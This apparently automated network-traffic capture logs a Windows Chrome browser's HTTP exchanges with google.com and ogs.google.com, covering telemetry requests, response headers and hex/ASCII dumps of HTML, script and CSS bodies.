2024-12-04 11:20:21 UTC	574	IN	Data Raw: 7b 22 63 68 75 6e 6b 54 79 70 65 73 22 3a 22 33 30 30 30 30 31 31 31 31 31 31 31 30 30 31 31 31 31 30 30 30 31 30 30 30 30 31 30 31 31 30 31 30 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 30 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: {"chunkTypes":"300001111111001111000100001011010000000111111111011101111111111111111111111111111111111010111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 32 32 32 32 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 Data Ascii: 121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212221212121212121212221222222221212121212121212122212121212121221212121212121212121212121112122212121212121212121212121
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 33 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 32 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 30 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111113111213111111111111111111111111111111111111111113111111113111111311111111111111111111111111101111111111111111111111111111111113111111111213111111111111111111111211111111213131111111111111113110111111010111111111111111111111111111111111111111111111
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 32 31 32 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 31 32 31 32 31 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 31 31 31 31 32 31 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 31 32 31 33 33 31 31 31 31 31 31 31 31 31 33 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 33 31 31 31 31 31 31 31 32 31 31 32 31 32 31 32 31 32 31 31 31 32 31 32 31 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 Data Ascii: 212121212121212121212121212121212121212121211212121221221211212121212121212121212112121121211212121121212121211111211212121212112121121331111111113212121212121212121212121212121212121212121212121213111111121121212121112121121212112121212121212121212121121
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 33 31 31 31 31 31 31 31 32 31 32 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 31 32 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 33 31 33 31 31 33 31 31 31 33 33 31 31 31 31 31 31 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 33 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111113111113111111121211211111111111111111111111111111111111111121212111113111111111111111331111111111111111111111111111111111133131131113311111113311111111111111111111333311111111111111211111111111111111111111111111
2024-12-04 11:20:21 UTC	448	IN	Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 33 31 31 31 31 33 31 31 31 32 32 32 32 32 32 32 32 32 32 33 31 31 31 31 31 31 32 32 32 32 33 31 30 30 30 30 32 30 32 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 31 33 31 31 32 32 32 31 32 32 32 32 32 32 31 31 32 31 31 31 31 31 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 33 33 31 31 31 32 32 32 33 32 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 32 32 32 32 32 32 32 32 30 32 30 32 30 32 32 32 Data Ascii: 000000000000001131111111111111111231111311122222222223111111222231000020200000000002000000000000131122212222221121111111111100000000000000000000000000000000000000000000000000011111111111111113111111331112223200000000020000000000000000200002222222202020222

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:21 UTC	1564	OUT	POST /gen_204?s=webhp&t=aft&atyp=csi&ei=7TpQZ5ybCP7V7M8PhYbCIQ&rt=wsrt.6131,aft.3561,afti.3561,cbt.219,hst.103,prt.3099&imn=11&ima=2&imad=0&imac=0&ddl=1&wh=870&aftie=NF&aft=1&aftp=870&opi=89978449&dt=&ts=199453 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:22 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-BHqjROr74HYYk4LZ8pv5aw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Wed, 04 Dec 2024 11:20:21 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:21 UTC	1941	OUT	POST /gen_204?atyp=csi&ei=7TpQZ5ybCP7V7M8PhYbCIQ&s=webhp&t=all&imn=11&ima=2&imad=0&imac=0&ddl=1&wh=870&aftie=NF&aft=1&aftp=870&adh=&ime=1&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=199153&ucb=199153&ts=199453&dt=&mem=ujhs.9,tjhs.12,jhsl.2173,dm.8&nv=ne.1,feid.74cc60e6-3e8c-4d5b-b0fb-21623cc82356&net=dl.1300,ect.3g,rtt.750,sd.0&hp=&sys=hc.4&p=bs.true&rt=hst.103,cbt.219,prt.3099,afti.3561,aftip.3096,aft.3561,aftqf.3561,xjses.5556,xjsee.5641,xjs.5641,lcp.3588,fcp.3106,wsrt.6131,cst.1700,dnst.139,rqst.1645,rspt.769,sslt.1700,rqstt.5255,unt.3414,cstt.3554,dit.9239&zx=1733311218317&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:22 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-_Ux0tb6QpPSVrmXlnHslKQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Wed, 04 Dec 2024 11:20:21 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:22 UTC	1250	OUT	GET /widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en HTTP/1.1 Host: ogs.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:23 UTC	2131	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Frame-Options: ALLOW-FROM https://www.google.com Content-Security-Policy: frame-ancestors https://www.google.com Content-Security-Policy: script-src 'report-sample' 'nonce-n0ZVFn5yhxgVBZLxjbN2Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/OneGoogleWidgetUi/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/OneGoogleWidgetUi/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/OneGoogleWidgetUi/cspreport x-ua-compatible: IE=edge Expires: Wed, 04 Dec 2024 11:20:22 GMT Date: Wed, 04 Dec 2024 11:20:22 GMT Cache-Control: private, max-age=3600 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Embedder-Policy-Report-Only: require-corp; report-to="CoepOneGoogleWidgetUi" Report-To: {"group":"CoepOneGoogleWidgetUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/OneGoogleWidgetUi"}]} Cross-Origin-Resource-Policy: same-site reporting-endpoints: default="/_/OneGoogleWidgetUi/web-reports?context=eJzjctHikmLw05BiKFj5gkni60smDSB2Sp_BGgTErTfPsU4F4qR_51mLgNhQ4RKrIxCr9lxiNQXiIokrrE1ALMTD8e3rgV1sAh9er7vMpKSWlF8Yn5-Xmp6fn56TmlFSUlCcWlSWWhRvZGBkYggk9AwN4gsMALr5L4Q" Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-04 11:20:23 UTC	2131	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 67 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 67 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 77 69 64 67 65 74 2f 63 61 6c 6c 6f 75 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 Data Ascii: 8000<!doctype html><html lang="en" dir="ltr"><head><base href="https://ogs.google.com/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><link rel="canonical" href="https://ogs.google.com/widget/callout"><link rel="
2024-12-04 11:20:23 UTC	2131	IN	Data Raw: 2e 63 63 54 69 63 6b 3d 67 3b 61 2e 6f 6e 4a 73 4c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 22 6a 73 6c 22 29 7d 3b 61 2e 6f 6e 43 73 73 4c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 22 63 73 73 6c 22 29 7d 3b 61 2e 5f 69 73 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 69 66 28 21 63 7c 7c 63 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 3d 22 6e 6f 6e 65 22 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 66 3d 62 2e 64 65 66 61 75 6c 74 56 69 65 77 3b 69 66 28 66 26 26 66 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 26 26 28 66 3d 66 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 63 29 2c 66 2e 68 65 69 67 68 74 3d 3d 22 30 70 78 22 7c 7c 66 2e 77 69 64 74 68 3d 3d 22 30 70 78 22 7c 7c 66 2e 76 69 73 69 62 69 Data Ascii: .ccTick=g;a.onJsLoad=function(){g("jsl")};a.onCssLoad=function(){g("cssl")};a._isVisible=function(b,c){if(!c\|\|c.style.display=="none")return!1;var f=b.defaultView;if(f&&f.getComputedStyle&&(f=f.getComputedStyle(c),f.height=="0px"\|\|f.width=="0px"\|\|f.visibi
2024-12-04 11:20:23 UTC	2131	IN	Data Raw: 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 7d 2e 4d 43 63 4f 41 63 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 4d 43 63 4f 41 63 3e 2e 70 47 78 70 48 63 7b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 30 7d 2e 49 71 42 66 4d 3e 2e 48 4c 6c 41 48 62 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 36 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 31 36 70 78 3b 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 39 7d 2e 56 55 6f 4b Data Ascii: ow-scrolling:touch}.MCcOAc{bottom:0;left:0;position:absolute;right:0;top:0;overflow:hidden;z-index:1}.MCcOAc>.pGxpHc{flex-shrink:0;flex-grow:0}.IqBfM>.HLlAHb{align-items:center;display:flex;height:60px;position:absolute;right:16px;top:0;z-index:9999}.VUoK
2024-12-04 11:20:23 UTC	2131	IN	Data Raw: 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 6e 2d 73 75 72 66 61 63 65 2d 76 61 72 69 61 6e 74 2c 23 63 34 63 37 63 35 29 7d 2e 4e 4b 6d 46 4e 63 2e 76 51 34 33 49 65 20 2e 68 58 68 68 71 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 2e 76 51 34 33 49 65 20 2e 68 58 68 68 71 7b 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 6e 2d 73 75 72 66 61 63 65 2c 23 65 33 65 33 65 33 29 7d 2e 4e 4b 6d 46 4e 63 2e 76 51 34 33 49 65 20 2e 78 46 49 54 6d 62 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 2e 76 51 34 33 49 65 20 2e 78 46 49 54 6d 62 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 23 63 34 Data Ascii: r(--gm3-sys-color-on-surface-variant,#c4c7c5)}.NKmFNc.vQ43Ie .hXhhq,.amE0Md.NKmFNc.vQ43Ie .hXhhq{color:#e3e3e3;color:var(--gm3-sys-color-on-surface,#e3e3e3)}.NKmFNc.vQ43Ie .xFITmb:focus-visible,.amE0Md.NKmFNc.vQ43Ie .xFITmb:focus-visible{outline-color:#c4
2024-12-04 11:20:23 UTC	2131	IN	Data Raw: 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 31 32 70 78 7d 2e 4e 4b 6d 46 4e 63 20 2e 72 72 34 79 35 63 7b 63 6f 6c 6f 72 3a 23 61 38 63 37 66 61 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 2c 23 61 38 63 37 66 61 29 7d 2e 72 72 34 79 35 63 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 70 61 63 69 74 79 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 62 35 37 64 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c Data Ascii: nter;padding:10px 12px}.NKmFNc .rr4y5c{color:#a8c7fa;color:var(--gm3-sys-color-primary,#a8c7fa)}.rr4y5c::before{content:" ";position:absolute;top:0;left:0;width:100%;height:100%;opacity:0;border-radius:100px;background:#0b57d0;background:var(--gm3-sys-col
